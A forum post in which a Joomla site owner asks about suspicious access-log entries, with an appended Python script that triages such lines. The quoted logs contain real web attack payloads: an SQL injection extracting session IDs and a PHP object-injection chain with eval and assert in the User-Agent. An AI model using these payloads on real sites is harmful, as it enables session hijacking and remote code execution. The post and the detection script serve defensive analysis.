Hello,
I am brand new to this forum and have a question about my access logs.
I go through them several times a week, and today I discovered actions that I don't fully understand!
Maybe an experienced user here can help me and, if need be, give tips/advice on whether
these are attempts to be taken seriously and what I can do about them.
How can it be, for example, that actions take place even though the IP addresses are excluded via Deny?
Here are a few excerpts from the current logs:
62.210.162.42 - - [12/Aug/2016:04:44:41 +0200] "GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=73&type_id=1&list[select]=(select 1=updatexml(1,concat(0x5e24,(select session_id from jos_session where guest<>1 limit 0,1),0x5e24),1)) HTTP/1.0" 403 177 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
Now with a 301 status:
62.210.162.42 - - [12/Aug/2016:04:44:41 +0200] "GET //index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=73&type_id=1&list[select]=(select 1=updatexml(1,concat(0x5e24,(select session_id from jos_session where guest<>1 limit 0,1),0x5e24),1)) HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
Here is something else...
157.55.39.170 - - [12/Aug/2016:03:02:54 +0200] "GET /111162965661983540126/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:54 +0200] "GET /tag/%e3%82%b3%e3%83%bc%e3%82%ae%e3%83%bc/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:54 +0200] "GET /asin/B0162IXSDO HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:54 +0200] "GET /special/2015/cyber/index2.html?cat_id=cyber_1225 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:55 +0200] "GET /index.php/ergebnisse2/jahr-2015 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:55 +0200] "GET /index.php/gale/v4Rav4RaIJB5pHOn/TosQTosQbARFlX0I-01.jsp HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:55 +0200] "GET /index.php/subspecies/v4Rav4RaIJB5xLTM/TosQQxSpIJB5pHOnTosQ-01.jsp HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:55 +0200] "GET /keyword/%A5%AE%A5%E3%A5%E9%A5%EB%A5%DB%A5%EB%A5%F3 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:55 +0200] "GET /keyword/%A5%CF%A5%C6%A5%CA HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:55 +0200] "GET /keyword/Edy HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:56 +0200] "GET /oricon HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:56 +0200] "GET /photo/1657/?cat_id=rightphoto02 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:56 +0200] "GET /post-11479/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:08 +0200] "GET /tag/%e3%83%96%e3%83%ab%e3%83%89%e3%83%83%e3%82%b0/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:08 +0200] "GET /tag/%e3%82%b7%e3%82%a7%e3%83%91%e3%83%bc%e3%83%89/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:08 +0200] "GET /post-5952/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:08 +0200] "GET /ticket/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:09 +0200] "GET /index.php/reflection/v4Rav4RaIJB5Fml0/v4RaQxSpFml0pHOn-01.jsp HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:09 +0200] "GET /index.php/heritage/v4Rav4RaIJB5TosQ/pHOnlX0ITosQbARF-01.jsp HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:09 +0200] "GET /index.php?main_page=index&cPath=11 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:09 +0200] "GET /tag/%e5%ad%90%e3%81%ad%e3%81%93/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:09 +0200] "GET /k/keywordblog/%E3%83%8F%E3%83%86%E3%83%8A HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:09 +0200] "GET /tag/%e3%83%a9%e3%83%96%e3%83%a9%e3%83%89%e3%83%bc%e3%83%ab/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:10 +0200] "GET /keyword/%A5%D1%A5%CA%A5%BD%A5%CB%A5%C3%A5%AF HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:10 +0200] "GET /tag/%e3%83%a9%e3%82%b0%e3%83%89%e3%83%bc%e3%83%ab/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
__test|O action (this dates from before I rebuilt the site)
74.208.132.3 - - [09/Aug/2016:16:31:25 +0200] "GET / HTTP/1.1" 301 178 "-" "}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:3858:\x22eval(base64_decode('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'));JFactory::getConfig();exit\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\xFD\xFD\xFD"
About the Joomla installation:
- current 3.6.2
- PHP 7.0.7 / MySQL PDO
- .htaccess protection in the root and as directory protection in the administrator folder
- as .htaccess I use the one offered by this site, with numerous additional IP denies
I hope for your help - thanks
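
Added example, not part of the original post: a small triage script for combined-format access log lines like the ones quoted above. It flags SQL fragments in the request and serialized PHP objects in the User-Agent, and reports how the server answered, since a denied request is still logged (with status 403). The function names `triage` and `summarize` are hypothetical, and the sample lines are constructed (documentation IP addresses, shortened payloads).

```python
import re
from urllib.parse import unquote

# Combined log format; the closing quote is optional because some lines
# in the post are cut off inside the User-Agent field.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>.*?)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>.*?)" "(?P<agent>.*?)"?$'
)
# SQL functions/keywords inside the request line (checked after URL-decoding).
SQLI_RE = re.compile(r'updatexml\s*\(|concat\s*\(|\bselect\b.+\bfrom\b', re.I)
# Serialized PHP object marker, e.g. O:21:"Name", with the quote logged as \x22.
PHP_OBJ_RE = re.compile(r'O:\d+:(?:\\x22|")\w+')

OUTCOME = {"403": "denied", "301": "redirected", "302": "redirected"}

def triage(line):
    """Return (ip, finding, outcome) for one log line, or None if unparsable."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    if PHP_OBJ_RE.search(m["agent"]):
        finding = "php-object-in-user-agent"
    elif SQLI_RE.search(unquote(m["request"])):
        finding = "sql-in-query-string"
    else:
        finding = "none"
    status = m["status"]
    outcome = OUTCOME.get(status, "served" if status.startswith("2") else "other")
    return m["ip"], finding, outcome

# Constructed sample lines modelled on the post; not the original log entries.
SAMPLE = [
    r'192.0.2.10 - - [12/Aug/2016:04:44:41 +0200] "GET /index.php?option=com_contenthistory&list[select]=(select 1=updatexml(1,2,3)) HTTP/1.0" 403 177 "-" "Mozilla/4.0 (compatible; Win32)"',
    r'192.0.2.10 - - [12/Aug/2016:04:44:41 +0200] "GET //index.php?option=com_contenthistory&list[select]=(select 1=updatexml(1,2,3)) HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; Win32)"',
    r'198.51.100.7 - - [09/Aug/2016:16:31:25 +0200] "GET / HTTP/1.1" 301 178 "-" "}__test|O:21:\x22JDatabaseDriverMysqli\x22:0:{}"',
    r'203.0.113.5 - - [12/Aug/2016:03:02:56 +0200] "GET /post-11479/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;',
]

def summarize(lines):
    """Triage every line; unparsable lines yield None."""
    return [triage(line) for line in lines]

if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(row)
```

Rows with a finding and the outcome `served` are the ones to look at first; `denied` and `redirected` rows show requests that were logged but answered with a 403 or a 301.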